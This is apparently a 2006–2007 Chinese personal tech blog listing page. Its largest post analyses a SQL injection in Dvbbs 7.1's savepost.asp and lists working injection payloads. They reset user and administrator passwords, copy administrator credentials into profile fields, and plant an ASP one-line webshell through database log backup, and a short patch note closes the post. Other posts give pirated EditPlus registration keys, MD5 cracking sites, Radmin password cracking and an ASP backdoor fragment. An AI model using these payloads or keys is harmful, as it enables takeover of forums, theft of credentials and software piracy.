EditPlus 3.31注册码
注册码1:
http://www.whitehouse.net.cn/
34713-CE648-CEZ26-17W4B-49TD8
注册码2:
http://www.whitehouse.net.cn/
2A713-CE648-1FZ85-E5W4B-3FT9A
注册码3:
http://www.whitehouse.net.cn/
...
2007年11月29日
SERV-U 6.4提权方法,通杀SERV-U版本
SERV-U 6.4提权方法
Tags: serv-u提权
发布:Eric | 分类:工具应用 | 评论:0 | 引用:0 | 浏览:
2007年9月30日
MD5在线破解的网站
关于一写MD5在线破解的网站 http://www.md5lookup.com/ (对数字破解比较好)http://md5.rednoize.com/ (对字母破解比较好)http://nz.md5.crysm.net/ (从1到4位数字)- 好像关了http://us.md5.crysm.net/ (美英字典的破解收集和IP地址)http://www.xmd5.org/ (对数字破解比较好)http://gdataonline.com/ (估计是基础字典的破解)http://www.hashc...
Tags: md5破解
发布:Eric | 分类:工具应用 | 评论:1 | 引用:0 | 浏览:
2007年9月23日
Radmin密码破解
Radmin 是一款很不错的服务器管理软件无论是 远程桌面控制 还是 文件传输 速度都很快 很方便 这样也形成了 很多服务器都装了 radmin这样的管理软件现在你说 4899默认端口 没密码的 服务器你上哪找?大家都知道radmin的密码都是32位md5加密后存放在注册表里的具体的表键值为 HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\那在攻陷一台web服务器时 大家 怎么能进一步提权?如果你说 暴力破解 radmin 密码 呵呵 那也行 只不过 你要有足...
Tags: Radmin密码破解
发布:Eric | 分类:工具应用 | 评论:0 | 引用:0 | 浏览:
2007年9月18日
Myeclipse&eclipse各版本及各版本注册码下载
Myeclipse eclipse合成版下载地址:
Myeclipse6.0M&Eclipse3.3下载地址:
Myeclipse5.5M&Eclipse3.22下载地址:
Myeclipse5.1包含eclipse3.2下载地址
Myeclipse5.0注册码下载
Myeclipse6.0注册码下载
Tags: Myeclipse注册码
发布:Eric | 分类:工具应用 | 评论:0 | 引用:0 | 浏览:
2007年9月4日
AVG Antispyware 离级升级包
以下两个链接系 AVG Antispyware 离线升级包官方下载地址,即每次使用以下链接下载,都会是官方最新的离线升级包,建议需要的朋友,收藏下载地址...这个离线升级包包含最近2 -3天的病毒库,适合日常升级用:http://downloads.ewido.net/avgas-signatures-current.exe这个离线升级包包含完整的病毒库,适合刚刚安装完 AVG Antispyware 时使用:http://downloads.ewido.net/avgas...
Tags: AVG Antispyware 离级升级包
发布:Eric | 分类:工具应用 | 评论:0 | 引用:0 | 浏览:
2007年5月31日
msstdfmt.dll与MSADODC.OCX
vb6程序打包不完全导致缺少的dll文件! VB6 程序缺少的动态链接库文件!msstdfmt.dllMSADODC.OCX使用方法:双击 eric_dll.bat200705310935277781.rar...
Tags: MSADODC.OCXMSADODC.OCX
发布:Eric | 分类:工具应用 | 评论:0 | 引用:0 | 浏览:
2006年7月18日
新型ASP后门
<%
'code by netpatch
dim dbfile,sql
db="netpatch.asp"
dbfile=server.MapPath(db)
'code by netpatch
dim dbfile,sql
db="netpatch.asp"
dbfile=server.MapPath(db)
Tags:
发布:Eric | 分类:工具应用 | 评论:2 | 引用:0 | 浏览:
2006年7月14日
Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范
一、概述
漏洞介绍:
前几天就听Hak_Ban说有人把dvbbs7的一个注入漏洞给发布出去了,一直也没时间看看,下午跟Edward要了个链接看了看:
http://coolersky.com/leak/programme/bbs/2006/0515/515.html
本站转贴为:
http://www.eviloctal.com/forum/read.php?tid=22074
看了看风尘浪子的分析,觉得已经分析的挺明白的了,不过群里还是有几个朋友搞不太明白,索性在本地搭环境测试一下漏洞,感谢keng提供程序,呵呵,实在懒得去网上找。
http://coolersky.com/articles/hack/analysis/programme/2006/0515/238.html
二、漏洞分析
既然是savepost.asp程序的问题,那就打开改文件,风尘浪子已经提到是ToolsBuyUser参数过滤不足,那就看这个变量。
32行,定义变量:
111行,置空
Private GetPostType,ToMoney,UseTools,ToolsBuyUser,GetMoneyType,Tools_UseTools,Tools_LastPostTime,ToolsInfo,ToolsSetting
120行,在参数GetPostType为0时,赋值
ToolsBuyUser = ""
123行,在参数GetPostType为1时,赋值
ToolsBuyUser = "0|||$SendMoney"
139行,在参数GetPostType为2时,赋值
ToolsBuyUser = "0|||$GetMoney"
747行,定义sql
ToolsBuyUser = "0@@@"&Buy_Orders&"@@@"&Buy_VIPType&"@@@"&Buy_UserList&"|||$PayMoney|||"
745行,执行sql
SQL="insert into "&TotalUseTable&"(Boardid,ParentID,username,topic,body,DateAndTime,length,RootID,layer,orders,ip,Expression,locktopic,signflag,emailflag,isbest,PostUserID,isupload,IsAudit,Ubblist,GetMoney,UseTools,PostBuyUser,GetMoneyType) values ("&Dvbbs.boardid&","&ParentID&",'"&username&"','"&topic&"','"&Content&"','"&DateTimeStr&"','"&Dvbbs.strlength(Content)&"',"&RootID&","&ilayer&","&iorders&",'"&Dvbbs.UserTrueIP&"','"&Expression(1)&"',"&locktopic&","&signflag&","&mailflag&",0,"&Dvbbs.userid&","&ihaveupfile&","&IsAudit&",'"&UbblistBody&"',"&ToMoney&",'"&UseTools&"','"&ToolsBuyUser&"',"&GetMoneyType&")"
我们看到,在整个获得数据到提交的过程中,没有对ToolsBuyUser参数进行安全过滤,导致了sql注入漏洞。
Dvbbs.Execute(sql)
三、漏洞利用
1、注册用户coolersky
2、选择发表新话题
3、在“选择帖子类型”中选中“论坛交易帖设置”
4、在“可购买用户名单限制:”中写入
修改口令后,重新登陆论坛,若使用123456登陆成功,则说明该漏洞尚未修补。
'将自身用户口令修改为123456
coolersky',0);update dv_user set userpassword='49ba59abbe56e057' where username='coolersky';--
5、获得前台管理员用户名和口令,分别放在自定义头像和签名中,查看用户coolersky的基本资料即可看到。
6、获得后台管理员用户名和口令
coolersky',0);update dv_user set userface=(select top 1 username from dv_user where userclass='管理员'),usersign=(select top 1 userpassword from dv_user where userclass='管理员') where username='coolersky';--
7、通过日志查看后台管理密码
coolersky',0);update dv_user set userface=(select top 1 username from dv_admin),usersign=(select top 1 password from dv_admin) where username='coolersky';--
8、获得数据库名称
coolersky',0);update dv_user set usersign=(select l_content from dv_log where l_content like '%password2%') where username='coolersky';--
9、日志差异备份webshell
coolersky',0);update dv_user set userface=(select db_name())where username='coolersky';--
或者
'替换dbname为上一步获得的数据库名称,日志差异备份要db_owner权限!
'替换d:\web\dvbbs7\为当前论坛物理路径,怎么获得别来问我!
coolersky',0);alter database dbname set RECOVERY FULL;create table temptt (a image);backup log dbname to disk = 'c:\acool_back' with init;insert into temptt (a) values ('<%execute request("l")%>');backup log dbname to disk = 'd:\web\dvbbs7\temptt.asp';drop table temptt;alter database dbname set RECOVERY SIMPLE;--
使用最小asp木马客户端连接即可!
coolersky',0);alter database dbname set RECOVERY FULL;create table temptt (a image);backup log dbname to disk = 'c:\acool_back' with init;insert into temptt (a) values (0x273C2565786563757465207265717565737428226C2229253E27);backup log dbname to disk = ''d:\web\dvbbs7\temptt.asp';drop table temptt;alter database dbname set RECOVERY SIMPLE;--
10、直接修改管理员口令
通过5、6、7三个步骤可以获得管理员前后台的用户名和密码,至少密码是16位md5,我们可以通过网络查询或者暴力破解获得管理员口令来登录前后台,但是也很可能没办法破解出口令。
而如果也无法获得论坛的物理路径,那么只好通过修改管理员口令来实现了,当然能不改管理员口令还是尽量避免修改,否则马上就被管理员知道被入侵了。
(1)获得前台管理员用户名:
(2)修改前台管理员口令:
coolersky',0);update dv_user set userface=(select top 1 username from dv_user where userclass='管理员')where username='test';--
(3)获得后台管理员用户名:
'假设我们获得前台管理员用户名为admin,修改密码为123456
coolersky',0);update dv_user set userpassword='49ba59abbe56e057' where username='admin';--
(4)修改后台管理员口令:
coolersky',0);update dv_user set userface=(select top 1 username from dv_admin)where username='test';--
(5)登录前台上传mdb构造过的asp一句话后门,后台back为asp或asa文件即可,如何操作不在本文描述过程中。
'假设我们获得后台管理员用户名为admin,修改密码为123456
coolersky',0);update dv_admin set password='49ba59abbe56e057' where username='admin';--
通过以上操作,只要服务器支持多语句,那么我们还可以对数据库进行更多操作。
四、漏洞修补
1、从dvbbs下载最新补丁
2、打开savepost.asp文件,将747行
http://bbs.dvbbs.net/dispbbs.asp?boardID=8&ID=1187367&page=1
修改为:
SQL="insert into "&TotalUseTable&"(Boardid,ParentID,username,topic,body,DateAndTime,length,RootID,layer,orders,ip,Expression,locktopic,signflag,emailflag,isbest,PostUserID,isupload,IsAudit,Ubblist,GetMoney,UseTools,PostBuyUser,GetMoneyType) values ("&Dvbbs.boardid&","&ParentID&",'"&username&"','"&topic&"','"&Content&"','"&DateTimeStr&"','"&Dvbbs.strlength(Content)&"',"&RootID&","&ilayer&","&iorders&",'"&Dvbbs.UserTrueIP&"','"&Expression(1)&"',"&locktopic&","&signflag&","&mailflag&",0,"&Dvbbs.userid&","&ihaveupfile&","&IsAudit&",'"&UbblistBody&"',"&ToMoney&",'"&UseTools&"','"&ToolsBuyUser&"',"&GetMoneyType&")"
即用dvbbs.checkstr函数过滤ToolsBuyUser内容。
SQL="insert into "&TotalUseTable&"(Boardid,ParentID,username,topic,body,DateAndTime,length,RootID,layer,orders,ip,Expression,locktopic,signflag,emailflag,isbest,PostUserID,isupload,IsAudit,Ubblist,GetMoney,UseTools,PostBuyUser,GetMoneyType) values ("&Dvbbs.boardid&","&ParentID&",'"&username&"','"&topic&"','"&Content&"','"&DateTimeStr&"','"&Dvbbs.strlength(Content)&"',"&RootID&","&ilayer&","&iorders&",'"&Dvbbs.UserTrueIP&"','"&Expression(1)&"',"&locktopic&","&signflag&","&mailflag&",0,"&Dvbbs.userid&","&ihaveupfile&","&IsAudit&",'"&UbblistBody&"',"&ToMoney&",'"&UseTools&"','"&dvbbs.checkstr(ToolsBuyUser)&"',"&GetMoneyType&")"
Tags:
发布:Eric | 分类:工具应用 | 评论:0 | 引用:0 | 浏览:
2006年7月6日
ASP数据库连接方式大全
<%
'#######以下是一个类文件,下面的注解是调用类的方法################################################
'# 注意:如果系统不支持建立Scripting.FileSystemObject对象,那么数据库压缩功能将无法使用
'# Access 数据库类
'# CreateDbFile 建立一个Access 数据库文件
'# CompactDatabase 压缩一个Access 数据库文件
'# 建立对象方法:
'# Set a = New DatabaseTools
'# by (萧寒雪) s.f.
'#########################################################################################
'#######以下是一个类文件,下面的注解是调用类的方法################################################
'# 注意:如果系统不支持建立Scripting.FileSystemObject对象,那么数据库压缩功能将无法使用
'# Access 数据库类
'# CreateDbFile 建立一个Access 数据库文件
'# CompactDatabase 压缩一个Access 数据库文件
'# 建立对象方法:
'# Set a = New DatabaseTools
'# by (萧寒雪) s.f.
'#########################################################################################
Class DatabaseTools
Public function CreateDBfile(byVal dbFileName,byVal DbVer,byVal SavePath)
'建立数据库文件
'If DbVer is 0 Then Create Access97 dbFile
'If DbVer is 1 Then Create Access2000 dbFile
On error resume Next
If Right(SavePath,1)<>"\" or Right(SavePath,1)<>"/" Then SavePath = Trim(SavePath) & "\"
If Left(dbFileName,1)="\" or Left(dbFileName,1)="/" Then dbFileName = Trim(Mid(dbFileName,2,Len(dbFileName)))
If DbExists(SavePath & dbFileName) Then
Response.Write ("对不起,该数据库已经存在!")
CreateDBfile = False
Else
Dim Ca
Set Ca = Server.CreateObject("ADOX.Catalog")
If Err.number<>0 Then
Response.Write ("无法建立,请检查错误信息
" & Err.number & "
" & Err.Description)
Err.Clear
Exit function
End If
If DbVer=0 Then
call Ca.Create("Provider=Microsoft.Jet.OLEDB.3.51;Data Source=" & SavePath & dbFileName)
Else
call Ca.Create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & SavePath & dbFileName)
End If
Set Ca = Nothing
CreateDBfile = True
End If
End function
Public function CompactDatabase(byVal dbFileName,byVal DbVer,byVal SavePath)
'压缩数据库文件
'0 为access 97
'1 为access 2000
On Error resume next
If Right(SavePath,1)<>"\" or Right(SavePath,1)<>"/" Then SavePath = Trim(SavePath) & "\"
If Left(dbFileName,1)="\" or Left(dbFileName,1)="/" Then dbFileName = Trim(Mid(dbFileName,2,Len(dbFileName)))
If DbExists(SavePath & dbFileName) Then
Response.Write ("对不起,该数据库已经存在!")
CompactDatabase = False
Else
Dim Cd
Set Cd =Server.CreateObject("JRO.JetEngine")
If Err.number<>0 Then
Response.Write ("无法压缩,请检查错误信息
" & Err.number & "
" & Err.Description)
Err.Clear
Exit function
End If
If DbVer=0 Then
call Cd.CompactDatabase("Provider=Microsoft.Jet.OLEDB.3.51;Data Source=" & SavePath & dbFileName,"Provider=Microsoft.Jet.OLEDB.3.51;Data
Source=" & SavePath & dbFileName & ".bak.mdb;Jet OLEDB;Encrypt Database=True")
Else
call Cd.CompactDatabase("Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &
SavePath & dbFileName,"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &
SavePath & dbFileName & ".bak.mdb;Jet OLEDB;Encrypt Database=True")
End If
'删除旧的数据库文件
call DeleteFile(SavePath & dbFileName)
'将压缩后的数据库文件还原
call RenameFile(SavePath & dbFileName & ".bak.mdb",SavePath & dbFileName)
Set Cd = False
CompactDatabase = True
End If
end function
Tags:
发布:Eric | 分类:工具应用 | 评论:0 | 引用:0 | 浏览:
网站分类
文章归档
- 2011 December (1)
- 2011 November (1)
- 2011 May (1)
- 2011 April (2)
- 2011 March (14)
- 2011 February (3)
- 2010 December (3)
- 2010 November (3)
- 2010 October (6)
- 2010 September (10)
- 2010 August (2)
- 2010 July (6)
- 2010 June (8)
- 2010 May (9)
- 2010 April (1)
- 2009 December (1)
- 2009 October (1)
- 2009 September (1)
- 2009 August (3)
- 2009 July (3)
- 2009 June (18)
- 2008 July (2)
- 2008 June (1)
- 2008 May (1)
- 2008 April (1)
- 2008 February (1)
- 2008 January (9)
- 2007 December (16)
- 2007 November (8)
- 2007 October (1)
- 2007 September (9)
- 2007 August (1)
- 2007 July (4)
- 2007 June (38)
- 2007 May (85)
- 2007 February (3)
- 2006 December (2)
- 2006 November (10)
- 2006 October (2)
- 2006 September (12)
- 2006 August (7)
- 2006 July (21)
- 2006 June (39)
Tags
- oracle (7)
- java (4)
- Tomcat (4)
- Hibernate (3)
- linux (3)
- Mysql (3)
- Error (2)
- java上传 (2)
- JSP彩色验证码 (2)
- javascript函数库 (2)
- JavaScript (2)
- shell (2)
- zblog技术 (2)
- 卡吧斯基7.0破解 (2)
- google (2)
- java之ftp上传 (1)
- java数组操作 (1)
- Server (1)
- Application (1)
- Windows破解 (1)
- 文件拷贝 (1)
- Java上传之三 (1)
- java文件上传下载 (1)
- 正则表达式 (1)
- XML文件解析 (1)
- ORACLE函数大全 (1)
- Interpreter (1)
- Visitor (1)
- Mediator (1)
- Strategy (1)
- Template (1)
- Observer (1)
- Command (1)
- FlyWeight (1)
- Bridge (1)
- Decorator (1)
- Composite (1)
- Facade (1)
- Proxy (1)
- Adapter (1)
- Prototype (1)
- Builder (1)
- Factory (1)
- Singleton (1)
- Ioc (1)
- 日期正则表达式 (1)
- Spring最佳实践一 (1)
- Spring最佳实践二 (1)
- Hibernate中文参考文档 (1)
- MyEclipse5.5注册码 (1)